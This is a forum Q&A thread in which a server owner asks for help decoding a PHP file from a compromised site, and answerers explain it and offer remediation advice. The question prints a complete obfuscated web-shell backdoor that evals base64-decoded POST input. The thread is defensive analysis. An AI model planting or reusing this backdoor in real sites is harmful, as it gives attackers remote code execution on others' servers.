Trying to decode a virus

Question

My server was recently attacked, and I've been trying to research how and why it is happening.

I have found a very similar pattern in the virus files that looks something like this - as far as I can tell it's trying to run a specific file?

Has anyone seen anything like this, and how should I interpret it? Is it just grabbing individual characters based on the $sF string?

<?php

$sF = "PCT4BA6ODSE_";
$s21 = strtolower($sF[4] . $sF[5] . $sF[9] . $sF[10] . $sF[6] . $sF[3] . $sF[11] . $sF[8] . $sF[10] . $sF[1] . $sF[7] . $sF[8] . $sF[10]);
$s22 = ${strtoupper($sF[11] . $sF[0] . $sF[7] . $sF[9] . $sF[2])}['nd335c3'];
if (isset($s22)) {
  eval($s21($s22));
}?>

Answer 1

The variable $s21 is equal to base64_decode and $s22 is equal to $_POST['nd335c3'].

Whenever a POST request is made to your server, it executes whatever command is in $_POST['nd335c3']; which as you can expect, is very dangerous.

I highly doubt your server was hacked but instead your website script was exploited. Is there anywhere on your site where users can upload files? I've seen a lot of stuff like this with WordPress with poorly coded Plugins.

Fixing The Problem

To fix the problem, first delete this file or the section of code. You may want to shutdown your site and put it in maintenance mode until you can search through and verify all other files have not been modified.

Once the site is back up and running, log the requests made to where the hacked file was located or requests that contain that same POST variable.

Once you have a user who sends data to the exploit, you can check all your other log files and compare them to the same IP address and User agent. This is a far shot but hopefully they use only one computer to do the attack. From the logs you can see what exactly they visited to possibly execute the attack and upload the exploited file.

Preventing This in the Future

1. Don't install any code you find online onto your site unless you trust the developer and believe it's fully secure and know that they release updates.
2. Set your web server to not have write access besides to the upload directory and /tmp
3. Verify all uploaded files to make sure they are exactly what you expect them to be.
4. Don't allow PHP to run where files are uploaded to, have the files downloaded as static direct files. This way if a file has been uploaded that bypasses your file checks, it still can't do any harm.

Answer 2

Just follow the contatination code base on $sF string, and you will see that

$21 = "base64_decode";
$22 = "_POST['nd335c3']";

and the rest of the code, basically check if _POST['nd335c3'] exists and if so execute PHP code: base64_decode(_POST['nd335c3']);

what is done next I can't really know, since you didn't display the entire code of the virus.

Hope it help a bit.